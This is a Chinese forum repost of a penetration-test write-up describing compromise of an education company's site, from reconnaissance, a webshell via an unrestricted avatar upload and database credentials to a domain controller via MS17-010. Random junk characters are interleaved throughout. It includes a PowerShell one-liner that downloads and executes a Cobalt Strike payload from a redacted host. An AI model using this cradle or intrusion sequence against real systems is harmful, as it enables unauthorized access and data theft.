|
# p6 N7 C+ _* Q H" `
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
+ Q- W \; _ @) ] j' K
( L. n' ~+ F$ \7 u. y; H* v6 N' W5 F' Q4 z
2 A" h# c' }/ h/ J6 u$ [. z& I
- I% g5 }4 Z4 ~! a4 V! c$ p6 r2 V+ N( R7 {/ O) O
正文- m: [$ R! h! ?4 ]: }5 X
5 t4 @3 ?: ^1 m _5 L9 u
- N4 p/ G- A! A4 w/ |/ r2 g
6 J2 ]; z% i5 O K0 S
3 n. y7 c0 z! a- d7 S( k, d0 X i. Y6 c3 f1 n1 K; z
目标:www.xxxx.com(一家教育机构)
, l6 Y( a) o: [0 s* F0 b& o打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能1 f$ M# R& h. G0 T1 y
2 x' l# w2 I0 ]3 C- ]" K0 [2 w& l: \' Q+ c! U, P
 2 d6 V. e9 K! k$ u# D/ R
* `% @' C- h$ A' g3 x* ^
g1 I* \4 X" K+ n+ }4 ]
进行了简单的信息搜集
9 @" I6 `! |# b- K
L+ r6 A, Z: e2 m5 r; H9 `% K1 \6 [ y, |( _
/ A' a' b g# H$ ~) G7 n7 g' |4 h+ [8 R7 b* E
子域名搜集7 A7 f* e. l4 \+ N B ^$ u" }, ?
0 s1 g9 v( |2 F! d
7 y, ]4 n0 S2 f% A' s h
' n9 G* p7 G( u/ H4 r9 y& F- b 3 w9 K, Q% u4 m" A/ h& x0 u2 i* O
5 a/ I) T) M# h. ~
fofa找资产
+ F5 M) ^. @8 S) K2 l$ v* |$ u
7 w; v. ~$ S6 S3 G
5 r5 _& K* ?3 C1 _: a" W# ~ , C W; q# w( y4 X. e8 W3 c
7 C" ?$ ^: U2 p r; m
6 a4 S& m5 l/ O
' I# V* R# ^/ X( F5 \! R5 B! `8 Z4 @2 R5 c# P3 I7 \+ \
一共七个资产。去重之后只有两个。
, N* I, `0 \6 s; t
6 H/ v7 S; U2 M# G+ ], a; c4 I; c
- u0 c/ M' r1 T9 }
$ G" o7 p6 J/ x
|5 D) K6 A. ?4 i& g3 H2 c1 v 目录探测, f ?) j; ~5 `, Q0 r' ~
; n3 D2 w5 I: h. x; D' C6 M! a) |6 `6 [$ p0 I7 z8 J1 | V
6 a' U! F# l6 z) _$ ^ 1 D5 c# D9 ?, p9 ^$ d$ o( _, \% P' c
l1 d; l. R: e s/ [ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
# r! M, o7 d( |- ]/ Y
G8 Q( a* `% B7 _5 n, H! n4 t
1 {* h. X' t. W: P
9 T1 ]5 n7 |$ S$ D. d: p5 v* ]5 X& a, F! u+ u6 M) m
我又尝试了通过修改返回包来绕过登录界面
3 Y n7 r" a U b9 \
9 V0 m! G9 L7 o, \. ]$ X& L$ t& t, y& A$ ]5 L4 |' D
 6 e) C, j. Y2 y1 k% W
( X- `8 O. y$ w5 L- d* @! s% V' U U( C: q. |$ r% c
还是不行,尝试注入无果
5 a# d) ]5 i- \* M1 Y! i + ?, S7 T" o0 B* l5 Z
5 X2 A" o! |' V V. X0 y( |) a
+ J* D2 z ~; c 5 l8 z! c( Y& u3 X3 F
% r3 ]/ l& O, v r* U
不过我目录探测出了一处Spring信息泄露
/ c0 C4 E/ \/ r9 [- w' d* }6 R
j. R7 f C0 ]
Q4 e( ?: p7 m" a
: z( Y/ D$ W8 J; a% Y( F8 |8 Q, H4 P0 j! a8 |. h
 + F; B; i3 W/ T, X' ^4 K$ ^
/ i7 w& i# P0 N( l" e3 x% h4 R8 I/ U. q* {
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
& E, `1 W1 j& q; g7 V+ h
6 p* a; f, X8 C7 E8 R/ R8 Z0 `6 {0 P1 R- m! P# q
4 Y s V8 T3 r) Y4 G8 P
4 m) Q' w/ J0 `7 z2 C" ]0 V2 x) T! H- N o9 ?" V) o0 L% e6 L
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。9 T/ _8 S* u; C
+ q% \2 E/ [: s6 B- {$ d* `
0 Z0 D" L& m. b5 c3 [  L9 S! X) _7 G$ Z+ l
1 X' w3 ]) x. N2 Q
- f8 Q# \2 u/ U$ b 获取有些师傅到这一步就手机抓包电脑测了。/ T$ X V' m3 I% G: M# b( Y
. E" u! t6 m7 u+ M: Y
+ Z# @$ g, W+ k; x! ~9 A Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
2 z8 X+ a3 _" X# [: y / }# Q( f! z$ ]
2 A4 b3 W8 B1 b* g
其中在一个公众号发现了小程序,可以进行注册。
) K) G' s2 ^: |7 d7 d , N: r* s3 J4 O& s F; w7 {
4 A( t) N) p1 {; E" j; c
看到了头像上传,尝试上传获取WebShell
: f2 O4 V! z. b
" J4 z7 v, ?% m0 [) }; Y
7 q4 y4 W" I; y# |" B4 b" A  8 W/ p8 ]( D7 q$ x' w
* A5 t+ I) I! s5 X( W3 v7 V* r) H' v- ^2 P& W- \
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
- T/ K+ f/ o/ x& d( y( Q" ]' V 6 H# H5 |6 }+ n% o% ^# G: e+ j+ H
1 U8 o$ P( y/ c2 B( O9 t" F, Q
 + E7 X T7 `3 @: }1 I' w) W
. K- E3 y% ]. _4 O- x% D: g3 p/ g8 l0 N$ }3 S- N
然后上了大马
4 {! f+ V1 M$ \
! Z$ H4 l2 b8 D9 b9 i# |( L' u) J9 O" e
* Y, }% f% M- G& e+ [ `6 K
' R0 f; U# L8 |0 d% u4 T! `2 N" h, X; h# a' x+ {
 4 ` s' z9 Z7 O) `9 `
; E+ f) g4 m6 m" ]2 I8 q3 l: }
- l( [: G) @% \, ^ u6 Y7 A% e% e 通过翻找文件发现数据库账号密码
4 F# d9 G; |1 \
4 ^* J( h! `1 h
+ a0 Y7 B$ ?: e y+ U9 i( a8 b 
& Q" |, f5 G' t* m$ T
) ?& {7 W( U( Y. |2 f8 s8 S
' T& P+ O" J g }) n3 ^% l2 e3 D. Z --内网渗透' x5 N' v, R5 T- j8 c, @
- W9 O7 n- o+ @* b$ p/ G2 }
/ n' u {! c8 T0 z1 s 直接通过powershell执行 cs上线
% X, e' ~4 i0 S( i+ ?7 A, _ 6 r: k" ?4 ~1 t
i" n4 X" n( O
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% r, |, j) [ N/ z) v
# z2 a9 g4 Y4 V% N: b1 B
( {& `4 v1 G" V
/ j+ {2 W$ h' _ % `3 Z: \/ W$ f" V1 |/ x3 ?5 G) u! N
* v1 ? E3 z. Z0 ^$ ?3 ~ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破% `+ k7 m( b5 }7 C
, Y" a* l& K6 N. g$ J$ W: L ~
% a6 w& d* r. l p+ I% q  0 m( c9 T3 Z8 N* A0 [
+ K: R1 z) l: f8 H. e$ U" V& t6 _" A) K1 x
3 y* U, ]9 b- c, Q+ t# F- l 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 y8 a' g' |, ^4 q5 L$ i! g
: {- M1 G0 q. |
0 e3 Z7 H/ X- G1 ?2 A( v
9 Z0 G* ^! q" C, x) r) D 1 n8 P% X8 w& P
, m- N$ K& K; z# [: b K6 i6 Q 
: e$ q, A* u- V. _5 Y5 E6 e
/ a9 q3 d. l" E* f% m# K1 @" U: F8 S+ N# g$ w! t$ o) i
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" U' N! E: m* |
) r: T. d; {$ R% n) P0 O, H3 S8 w& x& H
4 O1 Y m" _5 }+ T% |; G+ S9 U% ?- o+ m5 d
 9 {9 b. T4 H) s5 O2 r& X6 ?* b
$ y& C2 Z7 c T1 B; w
) m( ?5 Y& H, u7 j1 _
, [4 e2 l* a1 u" r) d# v
' p) O" l8 z8 Z# D* R9 M
' r0 O" x( P% e
! C( G" {% N& U6 X3 ~9 K q) }
9 ~7 q7 u* Y4 b3 [( Z8 [ 3 `7 {$ D9 \" {
5 ^& s+ j! i9 |3 N
M0 g* c: V; B5 f+ T8 {4 z8 @2 { 小结
- u) E, c2 x' y* E% N5 [/ w1 a
2 e+ W0 W; u/ T) n/ [# z9 G e- W+ G0 P7 l l: ]' d
& r# b3 i7 f' t1 X& D4 G
$ S4 T* a% Q# t: ^6 k1 B( i- ^6 H2 b: A
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!+ y' }% ?* T* a4 U: n
: K8 o2 `8 e% \3 g& Z
0 y$ j2 H/ Y8 A" l8 Y/ _. n : S1 b& B" L0 h- P: J2 s
+ W- X2 i6 a/ Q8 O
3 q% O+ j+ ?6 ~' H: B
-
4 E7 {9 |" \' X; r7 ^3 f - Z8 K% z a3 U; c6 \) Z
1 L% Y, D. Q" h7 b' u
-
. }& Z% R6 O) B8 q 2 ]* v" K+ {/ p- y
# H2 `8 Y3 ]1 A, x* d, S
# D1 A. G' g2 c1 t
( k5 h# S' \9 b5 } 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
Q8 m, ~6 r5 K1 T3 A, O) @2 d 1 i2 S3 m9 ~7 g+ R) K, t" Q
1 {8 | s9 P8 Z, X4 q* x $ g! Z- H9 h9 c; I5 V' X
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对